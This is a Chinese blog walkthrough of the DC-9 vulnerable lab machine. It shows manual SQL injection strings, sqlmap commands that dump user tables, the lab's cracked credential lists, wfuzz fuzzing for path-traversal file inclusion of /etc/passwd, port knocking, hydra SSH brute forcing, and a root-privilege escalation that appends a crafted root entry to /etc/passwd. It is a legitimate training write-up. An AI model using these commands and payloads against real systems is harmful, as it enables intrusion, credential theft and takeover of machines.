首页 > 其他分享 >DC-9靶机

DC-9靶机

时间:2023-08-16 21:01:13浏览次数:40  
标签:.. -- root DC 192.168 passwd 靶机 137.154

靶机下载地址:http://www.five86.com/downloads/DC-9.zip

1.查看kali靶机ip

2.nmap 192.168.137.0/24      nmap扫描同一网络段的靶机ip地址

3.访问靶机192.168.137.154    访问80端口

4.查看网站内容信息,在Display all Records里有一些用户信息

第三个Search,搜索

拿第一个用户姓氏尝试搜索

得到了用户得信息,尝试手工注入,看一下是不是有sql注入漏洞

常用的手工注入命令

1' and 1=1;# 判断是否可以被注入

1' or 1=1;#  尝试获取全部账号信息

1' union all select 1,2;#  尝试获取参数个数

1' union all select 1,(@@version);#  获取数据库版本

1' union all select 1,(databases());#  获取数据库名称

判断一下是否能注入

Mary' and 1=1;#

成功注入

sqlmap爆数据库

既然存在字符型sql注入漏洞,我们就使用sqlmap工具来爆出我们所需要的数据库信息:

1、爆数据库名,POST是请求发送数据,所以这里要指定–date参数为search

sqlmap -u 'http://192.168.137.154/results.php' --data 'search=1' --dbs --batch

2、爆staff数据库表名

sqlmap -u 'http://192.168.137.154/results.php' --data "search=1" -D Staff --tables --batch

3、爆users表的字段名

sqlmap -u 'http://192.168.137.154/results.php' --data "search=1" -D Staff -T Users --columns --batch

4、获取字段数据

sqlmap -u 'http://192.168.137.154/results.php' --data "search=1" -D Staff -T Users -C "UserID,Username,Password" --dump --batch

发现高级用户admin 密码856f5de590ef37314e7c3bdf6f8a66dc   MD5解密为 transorbital1

MD5解密网站https://www.somd5.com/

5.获取users数据库的信息

sqlmap -u 'http://192.168.137.154/results.php' --data "search=1" -D users -T UserDetails -C username,password,id --dump --batch

账号:

marym

julied

fredf

barneyr

tomc

jerrym

wilmaf

bettyr

chandlerb

joeyt

rachelg

rossg

monicag

phoebeb

scoots

janitor

janitor2

密码:

3kfs86sfd

468sfdfsd2

4sfd87sfd1

RocksOff

TC&TheBoyz

B8m#48sd

Pebbles

BamBam01

UrAG0D!

Passw0rd

yN72#dsd

ILoveRachel

3248dsds7s

smellycats

YR3BVxxxw87

Ilovepeepee

HawaiiFive0

用获得的账号admin密码transorbital1进行登录

登录成功,显示

测试一下看是否存在文件包含漏洞,

没有进去,说明存在参数,可以爆破一下参数

先获取保存一下cookie爆破要用到

这里可以用wfuzz工具进行爆破参数

wfuzz ‐b 'cl9ulqsmig0t6rqr2kejn5u0hb'  ‐w /usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt http://192.168.137.154/welcome.php?FUZZ=../../../../../etc/passwd

wfuzz --hw78 ‐b 'cl9ulqsmig0t6rqr2kejn5u0hb'  ‐w /usr/share/SecLists/Discovery/Web‐Content/burp‐parameter‐names.txt http://192.168.137.154/welcome.php?FUZZ=../../../../../etc/pa

得到参数名是file

访问 ?file=../../../../etc/passwd

成功利用文件包含漏洞查看passwd文件

后面不知道咋搞了,然后想起来了前面得到的账户密码信息,利用hydra海德拉爆一下ssh

hydra -L /home/kali/桌面/users.txt -P /home/kali/桌面/passwd.txt 192.168.137.154 ssh

结果发现被拒绝了

 

猜测是因为设置了敲门服务访问访问 /etc/knockd.conf查看端口信息

http://192.168.137.154/manage.php?file=../../../../../etc/knockd.conf

由端口信息文件得这三个端口分别是7469,8475,9842

 

利用knock工具,对获取的端口(开门密码)实现碰撞

安装命令 apt install knockd

knock 192.168.137.154 7469 8475 9842

或者

nmap -sV 192.168.137.154 -p 7469

nmap -sV 192.168.137.154 -p 8475

nmap -sV 192.168.137.154 -p 9842

nmap -sV 192.168.137.154

继续利用hydra海德拉爆一下ssh

hydra -L /home/kali/桌面/users.txt -P /home/kali/桌面/passwd.txt 192.168.137.154 ssh

login: chandlerb   password: UrAG0D!

login: joeyt   password: Passw0rd

login: janitor   password: Ilovepeepee

爆破出来有3个用户可用,通过ssh登录三个账号进行信息收集:

ls -al      查看用户文件

sudo -l          查看root权限

history           查看历史命令

chandlerb用户

joeyt用户

Janitor用户

在 janitor 用户登录的时候,在.secrets-for-putin发现了一些新的密码信息

BamBam01

Passw0rd

smellycats

P0Lic#10-4

B4-Tru3-001

4uGU5T-NiGHts

将其写入密码本进行2次ssh爆 破

hydra -L /home/kali/桌面/users.txt -P /home/kali/桌面/passwd.txt 192.168.137.154 ssh

发现新用户login: fredf   password: B4-Tru3-001

继续ssh登录查看信息

进入目录查看信息

发现一个test路径。得到一个python文件,然后查看这个python文件:

find / -name test.py 2>/dev/null

find:用于搜索文件和目录的命令。

/:起始搜索路径,这里表示从根目录开始搜索。

-name test.py:匹配要搜索的文件名为 "test.py"。您可以根据需要修改为其他文件名或正则表达式。

2>/dev/null:重定向错误输出,将错误信息屏蔽掉,只显示匹配的结果。

test.py文件的大致内容就是将参数1的内容写入参数2中

接下来尝试进行提权。

本地提权

先openssl passwd创建一个新用户和密码

 

openssl passwd -1 -salt root root

-1 #使用md5加密算法

-salt #自动锚入一个随机参数作为文件内容加密

$1$root$9gr5KxwuEdiI80GtIzd.U0

构造成/etc/passwd下的格式,保存在pass文件中

echo 'root:$1$root$9gr5KxwuEdiI80GtIzd.U0:0:0::/root:/bin/bash' >>pass

 

运行刚刚发现的test.py将pass写入到/etc/passwd

sudo /opt/devstuff/dist/test/test pass /etc/passwd 

http://192.168.137.154/welcome.php?file=../../../../etc/passwd再次查看发现成功写入root用户

如此我们便有了root权限直接进入root,成功拿下flag

 

标签:..,--,root,DC,192.168,passwd,靶机,137.154
From: https://www.cnblogs.com/therookieyapi/p/17636160.html

相关文章

  • SharkTeam:Worldcoin运营数据及业务安全分析
    Worldcoin的白皮书中声明,Worldcoin旨在构建一个连接全球人类的新型数字经济系统,由OpenAI创始人SamAltman于2020年发起。通过区块链技术在Web3世界中实现更加公平、开放和包容的经济体系,并将所有权赋予每个人。并且希望让全世界每一个人都能有最低的生活保障,提高全民基本收入,迎接共......
  • 漏洞复现-深信服DC数据中心管理系统 XXE漏洞
    0x01产品简介深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。0x02漏洞概述深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进......
  • 漏洞复现-深信服DC数据中心管理系统 XML注入漏洞
    0x01产品简介深信服是数据中心管理系统是DC为AC饿外置数据中心,主要用于海量日志数据的异地扩展备份管理,多条件的组合的高效查询,统计和趋势报表生成,设备运行状态监控等功能。0x02漏洞概述深信服是数据中心管理系统DC存在xml外部实体注入漏洞。由于后端对传入的xml对象进......
  • BOSHIDA DC电源模块高精度和稳定性的表现
    BOSHIDADC电源模块高精度和稳定性的表现DC电源模块作为电子产品中重要的组件之一,其生产用料的扎实程度对于产品性能和质量有着至关重要的影响。在DC电源模块生产过程中,一般需要使用高品质的电子元件和材料,以确保其性能和可靠性。 首先,DC电源模块生产所使用的电子元件需要具......
  • BOSHIDA DC电源模块减小输入电源与输出负载之间的能量损失
    BOSHIDADC电源模块减小输入电源与输出负载之间的能量损失随着电子产品的普及,DC电源模块已成为现代电子设备中不可或缺的组成部分。DC电源模块可以将交流电转化为直流电,并根据需要,以适当的电压和电流提供给输出负载。然而,在输入电源和输出负载之间,存在能量损失的问题,这对于一些特......
  • 【资料包】HDC.Together 2023精选Codelabs指南现已上线(内有活动)
     今年HDC.Together 2023的Codelabs挑战系列活动如期而至,众多开发者齐聚一堂,积极参与。本次赛题中部分Codelabs已在官网上线详细操作指南,让我们与众多coders一起探索代码的独特魅力。 01ArkTS基础知识(ArkTS)本课程使用声明式语法和组件化基础知识,搭建一个可刷新的排行榜页......
  • DC
    DC_1√Drupal依据后面得出:192.168.40.157前置知识:IP的组成IPv4地址的典型格式是A.B.C.D,其中A、B、C和D是范围在0到255之间的十进制数。每个单独的数字对应于地址的8位二进制字段,可以表示为8位的二进制数。IPv4由网络部分和主机部分组成A.B.C表示网络部......
  • 开源数据库Mysql_DBA运维实战 (DCL/日志)
    SQL(StructuredQueryLanguage即结构化查询语言)a.DDL语句 数据库定义语言:数据库,表,视图,索引,存储过程,函数,创建删除ALTER(CREATEDROPALTER) b.DML语句数据库操纵语言:插入数据INSERT、删除数据DELETE、更新数据UPDATEc.DQL语句 数据库查询语言:查询数据SELECTd.DCL语句数......
  • hdctf2023
    MISC0x00hardMisc直接记事本打开会出现乱码,用winhex打开复制16进制值,然后ASCII转16进制,base64解码SERDVEZ7d0UxYzB3M18xMF9IRGN0Zl9NMTVjfQ==HDCTF{wE1c0w3_10_HDctf_M15c}0x01MasterMisc所有的文件组成一个大的压缩包,用010爆破出密码,分离出音频文件音频隐写只有前部分,再......
  • Vulnhub: MoneyBox: 1靶机
    kali:192.168.111.111靶机:192.168.111.194信息收集端口扫描nmap-A-sC-v-sV-T5-p---script=http-enum192.168.111.194ftp匿名登录发现trytofind.jpg目录爆破发现blogs目录gobusterdir-uhttp://192.168.111.194-w/usr/share/wordlists/dirbuster/directory-li......